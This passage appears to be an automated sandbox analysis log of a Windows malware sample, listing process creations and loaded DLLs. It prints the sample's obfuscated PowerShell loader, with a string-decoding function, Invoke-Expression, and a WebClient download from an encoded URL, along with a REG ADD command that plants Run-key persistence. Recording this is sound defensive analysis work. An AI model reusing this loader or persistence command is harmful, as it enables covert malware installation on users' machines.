Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
